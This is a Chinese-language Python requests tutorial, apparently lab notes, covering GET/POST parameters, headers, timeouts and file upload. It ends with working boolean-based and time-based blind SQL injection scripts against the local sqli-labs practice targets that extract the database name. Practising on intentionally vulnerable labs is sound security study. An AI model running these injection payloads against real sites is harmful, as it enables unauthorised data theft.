py发送http请求
import requests
requests模块中的http方法
# Reference list of the HTTP-verb helpers exposed by the requests module.
# They are shown here without arguments; a real call needs at least a URL
# (see the worked examples further down, which also pass headers, params,
# data, files and timeout).
r=requests.get()
r=requests.post()
r=requests.put()
r=requests.delete()
r=requests.head()
r=requests.options()
参数:
GET参数 params
HTTP头部 headers
POST参数 data
文件 files
Cookies cookies
重定向处理 allow_redirects=False/True
超时 timeout
证书验证 verify=False/True
流式响应 stream=False/True
事件挂钩 hooks=dict(response=)
身份验证 auth=
代理 proxies=
对象方法:
URL .url
text .text
编码 .encoding | .encoding=
响应内容 .content
Json解码器 .json()
原始套接字响应 .raw | .raw.read() (需要开启stream=True)
历史响应代码 .history
抛出异常 .raise_for_status()
查看服务器响应头 .headers
查看发出的请求头 .request.headers
查看cookie .cookies
身份验证 .auth=
更新 .update
解析Link响应头 .links
用python发送request请求
import requests
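# Send a GET request and keep the Response in r. A timeout (in seconds) is
# passed so the script cannot block forever if the local server never answers;
# the original call had no timeout at all.
r = requests.get('http://localhost/pytest/get.php', timeout=5)
print(r.text)  # response body as text
print(r.status_code)  # HTTP status code
print(r.encoding)  # encoding requests uses to decode .text
print(r.headers)  # response headers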
定制头部
import requests
# Same GET as before, but with a custom User-Agent; printing
# r.request.headers shows the headers that were actually sent.
url = "http://localhost/pytest/get.php"
header = dict()
header["User-Agent"] = "dgut"
r = requests.get(url, headers=header)
print(r.request.headers)
定义超时时间
import requests
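url="http://localhost/pytest/timeout.php"
try:
    # Give up if the server has not answered within 3 seconds.
    r = requests.get(url=url, timeout=3)
    print(r.text)
except requests.exceptions.Timeout:
    # Only a real timeout is reported as "timeout". The original caught
    # Exception, which mislabelled connection errors and other failures;
    # those now propagate with their own message.
    print("timeout")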
给get方法传参
import requests
url = "http://localhost/pytest/get.php"
# Query-string parameters are given as a dict; requests encodes them onto
# the URL. Anything sent this way (here a password) ends up in the URL and
# therefore in server, proxy and browser history logs.
params = dict(name="test", pwd="test")
r = requests.get(url, params=params)
print(r.text)
给post方法传参
import requests
url = "http://localhost/pytest/post.php"
# Form fields passed via data= are sent in the request body rather than
# in the URL.
data = dict(username="test1", pwd="empty")
r = requests.post(url, data=data)
print(r.text)
上传文件
import requests
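url = "http://localhost/pikachu/vul/unsafeupload/clientcheck.php"
post = {"submit": "submit"}  # matches the submit button's type and name
# Open the file in a with-block so the handle is closed after the request
# has been sent; the original opened it inline and never closed it.
with open("title.png", "rb") as fh:
    upFile = {"uploadfile": fh}  # key matches the file input's name attribute
    r = requests.post(url=url, files=upFile, data=post)
print(r.text)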
通过py进行布尔盲注爆数据库名(sqli的less8)
import requests
import string
url = "http://127.0.0.1/sqli/Less-8/"
# Boolean-based blind injection exercise against the local sqli-labs
# Less-8 target: the page shows no error text, so the only signal is
# whether the response body has the same length as a normal page.
# Every probe is carried in the URL query string, so the whole sequence
# of requests is visible in the web server / proxy access logs.
webLen = len(requests.get(url=url+"?id=1").text)  # length of a normal page
print("Len of html is:"+str(webLen))
dbNameLen = 0
while 1:
    # Probe the database name length; the guess is right when the
    # page length equals the baseline.
    tUrl = url+"?id=1'+and+length(database())="+str(dbNameLen)+"--+"
    print(tUrl)
    if len(requests.get(tUrl).text) == webLen:
        print(dbNameLen)
        break
    if dbNameLen > 30:  # stop after 30 candidates
        print("error")
        break
    dbNameLen += 1
dbName = ""
for i in range(1, dbNameLen+1):
    for a in string.ascii_letters:
        # Try each ASCII letter at position i of the name.
        dbName_url = url + "?id=1'+and+substr(database(),"+str(i)+",1)='"+a+"'--+"
        print(dbName_url)
        if len(requests.get(dbName_url).text) == webLen:
            dbName += a
            break
print(dbName)
基于时间的盲注(sqli less9)
import requests
import string
url = "http://127.0.0.1/sqli/Less-9/?id=1"
# Time-based blind injection exercise against the local sqli-labs Less-9
# target: the page looks the same either way, so the signal is timing —
# a request that exceeds the 2 s timeout is treated as "condition true".
# Each true-branch probe makes the server sleep 6 s, so on the server side
# this shows up as a burst of abnormally slow requests with SQL fragments
# in the query string.
# determine the length of the database name
a = 0
while 1:
    dbLenUrl = url + "' and if(length(database())=" + str(a) + ",sleep(6),sleep(0))" + "--+"
    try:
        r = requests.get(url=dbLenUrl, timeout=2)
        a += 1  # answered in time: length a was wrong, try the next one
    except Exception as e:
        print("len is " + str(a))  # timed out: this length matched
        break
# determine the database name
dbName = ""
for i in range(1, a + 1):
    for each in string.ascii_letters:
        # if(substr(database(),i,1)='each',sleep(6),sleep(0))
        dbNameUrl = url + "' and if(substr(database()," + str(i) + ",1)='" + each + "',sleep(6),sleep(0))" + "--+"
        try:
            res = requests.get(url=dbNameUrl, timeout=2)
            continue  # answered in time: wrong letter
        except Exception as e:
            dbName = dbName + each  # timed out: letter matched
            print(dbName)
            break
print("databaseName is " + dbName)